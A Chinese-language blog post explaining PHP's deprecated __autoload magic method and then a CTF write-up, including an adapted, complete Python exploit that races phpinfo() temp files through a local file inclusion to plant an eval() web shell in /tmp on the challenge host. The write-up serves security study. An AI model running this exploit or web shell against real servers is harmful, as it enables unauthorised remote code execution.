autoload魔术方法的妙用

Delina

原文链接：autoload魔术方法的妙用
​
前言：__autoload魔术方法从PHP7.2.0开始被废弃，并且在PHP8.0.0以上的版本完全废除。取而代之的则是spl_autoload_register，但是本文还是研究__autoload。
什么是autoload魔术方法？首先还是从官方手册中下手，了解autoload函数

​

由此可见，__autoload魔术方法需要有一个类名的参数，使用这个魔术方法之后即可自动加载相应的类。
虽然说是自动，但是本质上还是需要我们指定类名，__autoload才会为我们包含文件，自动加载相应的类。
举一个简单的例子，假设我们有index.php业务代码如下：

1. <?php
   
2. function __autoload($classname){
   
3. include("class_$classname.php");
   
4. }
   
5. $a = new A();

复制代码

并且我们有class_A.php代码如下：

1. <?php
   
2. class A{
   
3. function __construct(){
   
4. echo "I am class A\n";
   
5. }
   
6. }

复制代码

我们可以看到，即使我们在index.php中没有包含class_A.php中的类A，但是在index.php中却新建了一个对象，此时因为在index.php中没有类A，所以PHP会自动调用__autoload魔术方法。而我们__autoload魔术方法的作用就是将相关文件包含进来，因此最终程序还是成功的将I am class A输出。

​

所以，__autoload只需要我们在魔术方法内写明一个逻辑：如果在后面的代码中，新建一个对象，找不到对应的类的时候，应该包含哪些文件。
autoload相比手动加载有哪些优势？虽然说感觉__autoload很智能，但是通过上方的例子并不能很明显体现__autoload的优点，因此下方换一个例子，用来展示__autoload相比手动加载的其他优势。
首先假设我们有autoload.php主业务逻辑代码如下：

1. <?php
   
2. 
   
3. require_once("class_A.php");
   
4. require_once("class_B.php");
   
5. require_once("class_C.php");
   
6. 
   
7. if ($_GET["class"] === 'A'){
   
8. $a = new A();
   
9. }
   
10. else if ($_GET["class"] === 'B'){
    
11. $b = new B();
    
12. }
    
13. else if ($_GET["class"] === 'C'){
    
14. $c = new C();
    
15. }

复制代码

光看这么一段代码就已经觉得手动加载很繁琐了，因为在这段代码中，仅仅只是包含了三个文件，虽然本质上的业务逻辑十分简单，但是代码看起来很繁琐，并且在这一段代码还存在一个很大的问题，就是资源的浪费。我们可以看到主要的业务逻辑就是一个if语句，并且无论我们往class中怎么传参，总是至少有两个类是无法新建的。也就是说，在代码最上方的三行包含文件代码中，至少有两行的文件加载是多余的。因此，这样就就造成了资源的浪费。那么如何解决这一个问题呢？
答案就是使用__autoload魔术方法，在我们需要的将相关文件包含进来。
因此我们将autoload.php代码修改如下：

1. <?php
   
2. 
   
3. function __autoload($classname){
   
4. require("class_$classname.php");
   
5. }
   
6. 
   
7. if ($_GET["class"] === 'A'){
   
8. $a = new A();
   
9. }
   
10. else if ($_GET["class"] === 'B'){
    
11. $b = new B();
    
12. }
    
13. else if ($_GET["class"] === 'C'){
    
14. $c = new C();
    
15. }

复制代码

这个时候不仅代码看上去清爽了很多，而且在理论上，运行的效率会更高，占用的系统资源会更少。除此之外，这么写其实还有一个优点，这里用到的文件包含函数是require，而上方使用的是require_once，这么写的好处就是：如果后面再次调用类A、B、C，那么PHP会自动从内存中加载这些类，不会再一次调用__autoload魔术方法。
那么，__autoload在开发中这么神奇，在安全中有没有什么利用场景呢？
有！那必然是有！下面将从一道CTF赛题中看看__autoload在安全中是怎么用的。
从一道CTF题看autoload首先题目代码如下：

1. <?php
   
2. 
   
3. /*
   
4. # -*- coding: utf-8 -*-
   
5. # @Author: h1xa
   
6. # @Date:   2020-10-13 11:25:09
   
7. # @Last Modified by:   h1xa
   
8. # @Last Modified time: 2020-10-19 07:12:57
   
9. 
   
10. */
    
11. include("flag.php");
    
12. error_reporting(0);
    
13. highlight_file(__FILE__);
    
14. 
    
15. class CTFSHOW{
    
16.    private $username;
    
17.    private $password;
    
18.    private $vip;
    
19.    private $secret;
    
20. 
    
21.    function __construct(){
    
22.        $this->vip = 0;
    
23.        $this->secret = $flag;
    
24.   }
    
25. 
    
26.    function __destruct(){
    
27.        echo $this->secret;
    
28.   }
    
29. 
    
30.    public function isVIP(){
    
31.        return $this->vip?TRUE:FALSE;
    
32.       }
    
33.   }
    
34. 
    
35.    function __autoload($class){
    
36.        if(isset($class)){
    
37.            $class();
    
38.   }
    
39. }
    
40. 
    
41. #过滤字符
    
42. $key = $_SERVER['QUERY_STRING'];
    
43. if(preg_match('/\_| |\[|\]|\?/', $key)){
    
44.    die("error");
    
45. }
    
46. $ctf = $_POST['ctf'];
    
47. extract($_GET);
    
48. if(class_exists($__CTFSHOW__)){
    
49.    echo "class is exists!";
    
50. }
    
51. 
    
52. if($isVIP && strrpos($ctf, ":")===FALSE && strrpos($ctf,"log")===FALSE){
    
53.    include($ctf);
    
54. }

复制代码

我们可以看到在类CTFSHOW里有一个__autoload魔术方法，虽然是在类里面，但是这是一个全局的魔术方法，也就是说只要调用未知名称的类，都会调用__autoload这个魔术方法，而__autoload魔术方法将传入的参数作为命令执行。然后我们再往下审计：

1. $key = $_SERVER['QUERY_STRING'];
   
2. if(preg_match('/\_| |\[|\]|\?/', $key)){
   
3.    die("error");
   
4. }
   
5. $ctf = $_POST['ctf'];
   
6. extract($_GET);

复制代码

这一部分代码是过滤部分字符，POST传入ctf，并且将GET请求中的变量名和值进行赋值

1. if(class_exists($__CTFSHOW__)){
   
2.    echo "class is exists!";
   
3. }

复制代码

这一部分有一个函数：class_exists
这一个函数和前面提到的新建对象一样，如果不存在这个类，同样也会调用__autoload魔术方法
而且需要有一个__CTFSHOW__变量，但是下划线过滤了。不过没关系，在PHP中，当我们使用.作为变量名时，PHP会将.转化为下划线。

1. if($isVIP && strrpos($ctf, ":")===FALSE && strrpos($ctf,"log")===FALSE){
   
2.    include($ctf);
   
3. }

复制代码

而这一部分代码不允许ctf中存在:，并且过滤了log，也就是不允许我们日志注入，但是这里存在一个文件包含。
因此我们可以考虑利用文件包含结合phpinfo进行RCE。

​

这里贴一个项目链接，这个项目大概就是可以通过phpinfo结合本地文件包含，利用PHP的文件上传会存在临时文件的特性，进行getshell，具体原理就不再赘述了，参考说明文档即可。
exp链接：vulhub/exp.py at master · vulhub/vulhub (github.com)
说明文档：vulhub/README.zh-cn.md at master · vulhub/vulhub (github.com)
将改exp修改部分后，如下：
​

1. #!/usr/bin/python
   
2. import sys
   
3. import threading
   
4. import socket
   
5. 
   
6. attempts_counter = 0
   
7. 
   
8. 
   
9. def setup(host, port, phpinfo_path, lfi_path, lfi_param, shell_code='<?php eval($_POST["mb"]);?>', shell_path='/tmp/g'):
   
10.    """
    
11.   根据提供参数返回请求内容
    
12.   :param host:HOST
    
13.   :param port:端口
    
14.   :param phpinfo_path: phpinfo文件地址
    
15.   :param lfi_path: 包含lfi的文件地址
    
16.   :param lfi_param: lfi载入文件时, 指定文件名的参数
    
17.   :param shell_code: shell代码
    
18.   :param shell_path: shell代码保存位置
    
19.   :return:
    
20.       phpinfo_request: phpinfo 请求内容
    
21.       lfi_request: lfi 请求内容
    
22.       tag: 标识内容
    
23.   """
    
24.    tag = 'Security Test'   # 搜索验证标识
    
25.    payload = \
    
26. '''{tag}\r
    
27. <?php $c=fopen('{shell_path}','w');fwrite($c,'{shell_code}');?>\r
    
28. '''.format(shell_code=shell_code, tag=tag, shell_path=shell_path)
    
29. 
    
30.    request_data = \
    
31. '''-----------------------------7dbff1ded0714\r
    
32. Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
    
33. Content-Type: text/plain\r
    
34. \r
    
35. {payload}
    
36. -----------------------------7dbff1ded0714--\r
    
37. ''' .format(payload=payload)
    
38. 
    
39.    phpinfo_request = \
    
40. '''POST {phpinfo_path}?%5f%5fCTFSHOW%5f%5f=phpinfo&a={padding} HTTP/1.1\r
    
41. Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie={padding}\r
    
42. HTTP_ACCEPT: {padding}\r
    
43. HTTP_USER_AGENT: {padding}\r
    
44. HTTP_ACCEPT_LANGUAGE: {padding}\r
    
45. HTTP_PRAGMA: {padding}\r
    
46. Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
    
47. Content-Length: {request_data_length}\r
    
48. Host: {host}:{port}\r
    
49. \r
    
50. {request_data}
    
51. '''.format(
    
52.    padding='A' * 4000,
    
53.    phpinfo_path=phpinfo_path,
    
54.    request_data_length=len(request_data),
    
55.    host=host,
    
56.    port=port,
    
57.    request_data=request_data
    
58.   )
    
59. 
    
60.    lfi_request = \
    
61. '''POST {lfi_path}?{lfi_param} HTTP/1.1\r
    
62. User-Agent: Mozilla/4.0\r
    
63. Proxy-Connection: Keep-Alive\r
    
64. Host: {host}\r
    
65. Content-Type: application/x-www-form-urlencoded\r
    
66. \r
    
67. ctf={{}}\r
    
68. '''.format(
    
69.    lfi_path=lfi_path,
    
70.    lfi_param=lfi_param,
    
71.    host=host
    
72.   )
    
73.    return phpinfo_request, tag, lfi_request
    
74. 
    
75. 
    
76. def phpinfo_lfi(host, port, phpinfo_request, offset, lfi_request, tag):
    
77.    """
    
78.   通过向phpinfo发送大数据包延缓时间, 然后利用lfi执行
    
79.   :param host:HOST
    
80.   :param port:端口
    
81.   :param phpinfo_request: phpinfo页面请求内容
    
82.   :param offset: tmp_name在phpinfo中的偏移位
    
83.   :param lfi_request: lfi页面请求内容
    
84.   :param tag: 标识内容
    
85.   :return:
    
86.       tmp_file_name: 临时文件名
    
87.   """
    
88.    phpinfo_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
89.    lfi_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
90. 
    
91.    phpinfo_socket.connect((host, port))
    
92.    lfi_socket.connect((host, port))
    
93. 
    
94.    # 1. 先向phpinfo发送大数据包, 且其中包含php会将payload放入临时文件中
    
95.    # print(phpinfo_request)
    
96.    # print(lfi_request)
    
97.    phpinfo_socket.send(phpinfo_request.encode())
    
98. 
    
99.    phpinfo_response_data = ''
    
100.    while len(phpinfo_response_data) < offset:
     
101.        # 取不到数据则反复执行
     
102.        phpinfo_response_data += phpinfo_socket.recv(offset).decode()
     
103. 
     
104.    try:
     
105.        tmp_name_index = phpinfo_response_data.index('[tmp_name] =>')
     
106.        # 获取包含payload的临时文件名
     
107.        tmp_file_name = phpinfo_response_data[
     
108.                            tmp_name_index + 17:
     
109.                            tmp_name_index + 31
     
110.                       ]
     
111.    except ValueError:
     
112.        return None
     
113.    # 2. 再向lfi发送包含payload的临时文件名, 用于包含
     
114.    lfi_socket.send((lfi_request.format(tmp_file_name)).encode())
     
115.    # print(lfi_request.format(tmp_file_name))
     
116.    lfi_response_data = lfi_socket.recv(4096).decode()
     
117. 
     
118.    # 3. 停止phpinfo socket连接
     
119.    phpinfo_socket.close()
     
120.    # 4. 停止lfi socket连接
     
121.    lfi_socket.close()
     
122.    if lfi_response_data.find(tag) != -1:
     
123.        # 5. lfi response中存在标识内容则payload执行成功
     
124.        return tmp_file_name
     
125. 
     
126. 
     
127. class ThreadWorker(threading.Thread):
     
128.    def __init__(self, event, lock, max_attempts,
     
129.                 host, port, phpinfo_request,
     
130.                 offset, lfi_request, tag,
     
131.                 shell_code, shell_path,
     
132.                 lfi_path, lfi_param):
     
133.        threading.Thread.__init__(self)
     
134.        self.event = event
     
135.        self.lock = lock
     
136.        self.max_attempts = max_attempts
     
137.        self.host = host
     
138.        self.port = port
     
139.        self.phpinfo_request = phpinfo_request
     
140.        self.offset = offset
     
141.        self.lfi_request = lfi_request
     
142.        self.tag = tag
     
143.        self.shell_code = shell_code
     
144.        self.shell_path = shell_path
     
145.        self.lfi_path = lfi_path
     
146.        self.lfi_param = lfi_param
     
147. 
     
148.    def run(self):
     
149.        global attempts_counter
     
150.        while not self.event.is_set():
     
151.            # 如果没有set event则一直重复执行, 直到已尝试次数大于最大尝试数(attempts_counter > max_attempts)
     
152.            with self.lock:
     
153.                # 获取锁, 执行完后释放
     
154.                if attempts_counter >= self.max_attempts:
     
155.                    return
     
156.                attempts_counter += 1
     
157.            try:
     
158.                tmp_file_name = phpinfo_lfi(
     
159.                    self.host, self.port, self.phpinfo_request, self.offset, self.lfi_request, self.tag)
     
160.                if self.event.is_set():
     
161.                    break
     
162.                if tmp_file_name:
     
163.                    # 找到tmp_file_name后通过set event停止运行
     
164.                    print('\n{shell_code} 已经被写入到{shell_path}中'.format(
     
165.                        shell_code=self.shell_code,
     
166.                        shell_path=self.shell_path
     
167.                   ))
     
168.                    'http://127.0.0.1/test/lfi_phpinfo/lfi.php?load=/tmp/gc&f=uname%20-a'
     
169.                    print('默认调用方法: http://{host}:{port}{lfi_path}?{lfi_param}={shell_path}&f=uname%20-a'.format(
     
170.                        host=self.host,
     
171.                        port=self.port,
     
172.                        lfi_path=self.lfi_path,
     
173.                        lfi_param=self.lfi_param,
     
174.                        shell_path=self.shell_path
     
175.                   ))
     
176. 
     
177.                    self.event.set()
     
178.            except socket.error:
     
179.                return
     
180. 
     
181. 
     
182. def get_offset(host, port, phpinfo_request):
     
183.    """
     
184.   获取tmp_name在phpinfo中的偏移量
     
185.   :param host: HOST
     
186.   :param port: 端口
     
187.   :param phpinfo_request: phpinfo 请求内容
     
188.   :return:
     
189.       tmp_name在phpinfo中的偏移量
     
190.   """
     
191. 
     
192.    phpinfo_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     
193.    phpinfo_socket.connect((host, port))
     
194.    phpinfo_socket.send(phpinfo_request.encode())
     
195.    phpinfo_response_data = ''
     
196.    while True:
     
197.        i = phpinfo_socket.recv(4096).decode()
     
198.        phpinfo_response_data += i
     
199.        if i == '':
     
200.            break
     
201. 
     
202.        # 检测是否是最后一个数据块
     
203.        if i.endswith('0\r\n\r\n'):
     
204.            break
     
205.    phpinfo_socket.close()
     
206.    tmp_name_index = phpinfo_response_data.find('[tmp_name] =>')
     
207.    print(phpinfo_response_data)
     
208.    if tmp_name_index == -1:
     
209.        raise ValueError('没有在phpinfo中找到tmp_name')
     
210.    print('找到了 {} 在phpinfo内容索引为{}的位置'.format(
     
211.        phpinfo_response_data[tmp_name_index:tmp_name_index+10], tmp_name_index))
     
212. 
     
213.    return tmp_name_index + 256
     
214. 
     
215. 
     
216. def main():
     
217.    pool_size = 100
     
218.    host = '7438117e-d02c-467c-859a-17c47f67b37e.challenge.ctf.show'
     
219.    port = 8080
     
220.    phpinfo_path = '/'
     
221.    lfi_path = '/'
     
222.    lfi_param = 'isVIP=1'
     
223.    shell_code = '<?php eval($_POST["mb"]);?>'
     
224.    shell_path = '/tmp/g'
     
225.    # 最大尝试次数
     
226.    max_attempts = 1000
     
227. 
     
228.    print('LFI With PHPInfo()')
     
229.    # 一 生成phpinfo请求内容, 标志内容, lfi请求内容
     
230.    phpinfo_request, tag, lfi_request = setup(
     
231.        host=host, port=port, phpinfo_path=phpinfo_path, lfi_path=lfi_path,
     
232.        lfi_param=lfi_param, shell_code=shell_code, shell_path=shell_path)
     
233. 
     
234.    # 二 获取[tmp_name]在phpinfo中的偏移位
     
235.    offset = get_offset(host, port, phpinfo_request)
     
236. 
     
237.    sys.stdout.flush()
     
238.    thread_event = threading.Event()
     
239.    thread_lock = threading.Lock()
     
240.    print('创建线程池 {}...'.format(pool_size))
     
241.    sys.stdout.flush()
     
242.    thread_pool = []
     
243.    for i in range(0, pool_size):
     
244.        # 三 多线程执行phpinfo_lfi
     
245.        thread_pool.append(ThreadWorker(thread_event, thread_lock, max_attempts,
     
246.                                        host, port, phpinfo_request, offset,
     
247.                                        lfi_request, tag,
     
248.                                        shell_code, shell_path,
     
249.                                        lfi_path, lfi_param
     
250.                                       ))
     
251.    for t in thread_pool:
     
252.        t.start()
     
253.    try:
     
254.        while not thread_event.wait(1):
     
255.            if thread_event.is_set():
     
256.                break
     
257.            with thread_lock:
     
258.                sys.stdout.write('\r{} / {}'.format(attempts_counter, max_attempts))
     
259.                sys.stdout.flush()
     
260.                if attempts_counter >= max_attempts:
     
261.                    # 尝试次数大于最大尝试次数则退出
     
262.                    break
     
263.        if thread_event.is_set():
     
264.            print('''success !''')
     
265.        else:
     
266.            print('LJBD!')
     
267.    except KeyboardInterrupt:
     
268.        print('\n正在停止所有线程...')
     
269.        thread_event.set()
     
270.    for t in thread_pool:
     
271.        t.join()
     
272. 
     
273. 
     
274. if __name__ == "__main__":
     
275.    main()

复制代码

当然啦，这题除了可以利用__autoload魔术方法结合本地文件包含getshell，也可以用php上传文件条件竞争来做。

总结：__autoload之所以好用，首先是因为它是一个全局的魔术方法，并且开发者在使用__autoload的时候，往往是为了包含相关的文件，而在指定包含的文件名时，就可能会出现包含文件可控的情况，虽然__autoload已经在新版本的PHP中废弃，但是在对我们研究老版本的PHP项目，还是有一定指导意义的。